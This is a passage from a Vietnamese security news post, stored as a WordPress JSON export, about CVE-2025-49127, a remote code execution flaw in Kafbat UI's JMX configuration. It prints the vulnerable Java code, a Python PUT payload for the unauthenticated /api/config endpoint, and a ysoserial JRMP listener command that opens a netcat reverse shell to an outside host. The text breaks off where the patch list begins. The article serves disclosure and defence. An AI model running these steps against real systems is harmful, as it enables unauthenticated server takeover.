{"id":10491,"date":"2025-07-16T12:37:22","date_gmt":"2025-07-16T05:37:22","guid":{"rendered":"https:\/\/infosec.new88088.net\/?p=10491"},"modified":"2026-02-05T12:37:28","modified_gmt":"2026-02-05T05:37:28","slug":"lo-hong-cve-2025-49127-trong-kafbat-ui-cho-phep-thuc-thi-ma-tu-xa-qua-jmx","status":"publish","type":"post","link":"https:\/\/infosec.new88088.net\/2025\/07\/16\/lo-hong-cve-2025-49127-trong-kafbat-ui-cho-phep-thuc-thi-ma-tu-xa-qua-jmx\/","title":{"rendered":"L\u1ed7 h\u1ed5ng CVE-2025-49127 trong Kafbat UI cho ph\u00e9p th\u1ef1c thi m\u00e3 t\u1eeb xa qua JMX"},"content":{"rendered":"

M\u1ed9t l\u1ed7 h\u1ed5ng th\u1ef1c thi m\u00e3 t\u1eeb xa (RCE) nghi\u00eam tr\u1ecdng v\u1eeba \u0111\u01b0\u1ee3c ph\u00e1t hi\u1ec7n trong Kafbat UI, giao di\u1ec7n qu\u1ea3n l\u00fd m\u00e3 ngu\u1ed3n m\u1edf d\u00e0nh cho Apache Kafka. L\u1ed7 h\u1ed5ng n\u00e0y \u0111\u01b0\u1ee3c g\u00e1n m\u00e3 CVE-2025-49127 v\u00e0 \u0111\u01b0\u1ee3c \u0111\u00e1nh gi\u00e1 \u0111i\u1ec3m CVSS 10.0.<\/b><\/p>\n

\n
\"kafbat.png\"<\/div>\n<\/div>\n

K\u1ebd h\u1edf t\u1eeb JMX trong c\u1ea5u h\u00ecnh \u0111\u1ed9ng\u200b<\/h3>\n

Phi\u00ean b\u1ea3n Kafbat UI 1.0.0 cho ph\u00e9p ng\u01b0\u1eddi d\u00f9ng c\u1ea5u h\u00ecnh c\u1ee5m Kafka m\u1ed9t c\u00e1ch \u201c\u0111\u1ed9ng\u201d b\u1eb1ng c\u00e1ch nh\u1eadp v\u00e0o c\u00e1c th\u00f4ng tin host v\u00e0 c\u1ed5ng k\u1ebft n\u1ed1i JMX. Tuy nhi\u00ean, thay v\u00ec ki\u1ec3m tra v\u00e0 gi\u1edbi h\u1ea1n \u0111\u1ea7u v\u00e0o, \u1ee9ng d\u1ee5ng n\u00e0y l\u1ea1i x\u00e2y d\u1ef1ng \u0111\u1ecba ch\u1ec9 JMX m\u1ed9t c\u00e1ch m\u00f9 qu\u00e1ng t\u1eeb d\u1eef li\u1ec7u do ng\u01b0\u1eddi d\u00f9ng cung c\u1ea5p:<\/p>\n

\n
M\u00e3:<\/div>\n
\n
String jmxUrl = \"service:jmx:rmi:\/\/\/jndi\/rmi:\/\/\"\r\n        + node.host() + \":\" + c.getMetricsConfig().getPort()\r\n        + \"\/jmxrmi\";\r\nconnector.connect(env);<\/code><\/pre>\n<\/div>\n<\/div>\n
Do t\u00ednh n\u0103ng x\u00e1c th\u1ef1c b\u1ecb v\u00f4 hi\u1ec7u h\u00f3a m\u1eb7c \u0111\u1ecbnh (auth.type: DISABLED), b\u1ea5t k\u1ef3 ai c\u0169ng c\u00f3 th\u1ec3 g\u1eedi m\u1ed9t y\u00eau c\u1ea7u PUT \u0111\u1ebfn endpoint \/api\/config \u0111\u1ec3 khai b\u00e1o c\u1ee5m Kafka m\u1edbi v\u1edbi ki\u1ec3u metric l\u00e0 JMX v\u00e0 ch\u1ec9 \u0111\u1ecbnh m\u1ed9t c\u1ed5ng b\u1ea5t k\u1ef3.<\/p>\n
Trong v\u00f2ng 30 gi\u00e2y sau \u0111\u00f3, tr\u00ecnh thu th\u1eadp metric s\u1ebd g\u1ecdi t\u1edbi connector.connect(), kh\u1edfi \u0111\u1ed9ng b\u1eaft tay RMI v\u1edbi m\u00e1y ch\u1ee7 \u0111\u1ed9c h\u1ea1i v\u00e0 t\u1ea3i v\u1ec1 chu\u1ed7i payload \u0111\u01b0\u1ee3c t\u1ea1o b\u1eb1ng th\u01b0 vi\u1ec7n ysoserial (s\u1eed d\u1ee5ng gadget CommonsCollections7), t\u1eeb \u0111\u00f3 th\u1ef1c thi l\u1ec7nh t\u00f9y \u00fd tr\u00ean h\u1ec7 th\u1ed1ng b\u1eb1ng Runtime.exec().<\/p>\n
Khai th\u00e1c l\u1ed7 h\u1ed5ng: PUT request m\u1edf \u0111\u01b0\u1eddng cho reverse shell<\/b>\u200b<\/h3>\n
C\u00e1c nh\u00e0 nghi\u00ean c\u1ee9u b\u1ea3o m\u1eadt \u0111\u00e3 c\u00f4ng b\u1ed1 m\u1ed9t k\u1ef9 thu\u1eadt khai th\u00e1c hai giai \u0111o\u1ea1n: b\u01b0\u1edbc \u0111\u1ea7u g\u1eedi c\u1ea5u h\u00ecnh c\u1ee5m ch\u1ee9a payload JMX \u0111\u1ed9c h\u1ea1i, ti\u1ebfp theo thi\u1ebft l\u1eadp listener \u0111\u1ec3 ch\u1edd reverse shell, t\u1eeb \u0111\u00f3 gi\u00e0nh quy\u1ec1n \u0111i\u1ec1u khi\u1ec3n h\u1ec7 th\u1ed1ng t\u1eeb xa.<\/p>\n
\u0110o\u1ea1n m\u00e3 Python g\u1eedi c\u1ea5u h\u00ecnh \u0111\u1ed9c h\u1ea1i nh\u01b0 sau:<\/p>\n
\n
M\u00e3:<\/div>\n
\n
payload = {\r\n  \"config\": {\r\n    \"properties\": {\r\n      \"kafka\": {\r\n        \"clusters\": [{\r\n          \"name\": \"rce\",\r\n          \"bootstrapServers\": \"kafka-malicious-broker:9093\",\r\n          \"metrics\": {\"type\": \"JMX\", \"port\": 1719}\r\n        }]\r\n      }\r\n    }\r\n  }\r\n}\r\nrequests.put(\"http:\/\/target80\/api\/config\", json=payload, timeout=30)<\/code><\/pre>\n<\/div>\n<\/div>\n
K\u1ebf ti\u1ebfp, m\u00e1y ch\u1ee7 \u0111\u1ed9c h\u1ea1i m\u1edf listener JRMP b\u1eb1ng ysoserial:<\/p>\n
\n
M\u00e3:<\/div>\n
\n
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1719 CommonsCollections7 \\\r\n     \"nc 192.0.2.10 9094 -e \/bin\/sh\"<\/code><\/pre>\n<\/div>\n<\/div>\n
Ch\u1ec9 v\u00e0i gi\u00e2y sau, reverse shell s\u1ebd \u0111\u01b0\u1ee3c g\u1eedi v\u1ec1 c\u1ed5ng 9094, cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng \u0111i\u1ec1u khi\u1ec3n m\u00e1y ch\u1ee7 t\u1eeb xa m\u00e0 kh\u00f4ng c\u1ea7n th\u00f4ng tin \u0111\u0103ng nh\u1eadp. Qu\u00e1 tr\u00ecnh n\u00e0y ho\u1ea1t \u0111\u1ed9ng \u1ed5n \u0111\u1ecbnh tr\u00ean b\u1ea3n tri\u1ec3n khai Docker m\u1eb7c \u0111\u1ecbnh.<\/p>\n
B\u1ea3n v\u00e1 v\u00e0 bi\u1ec7n ph\u00e1p ph\u00f2ng ng\u1eeba kh\u1ea9n c\u1ea5p\u200b<\/h3>\n
\u0110\u1ed9i ng\u0169 ph\u00e1t tri\u1ec3n Kafbat \u0111\u00e3 nhanh ch\u00f3ng ph\u00e1t h\u00e0nh b\u1ea3n v\u00e1 1.1.0 v\u1edbi ba thay \u0111\u1ed5i quan tr\u1ecdng:<\/p>\n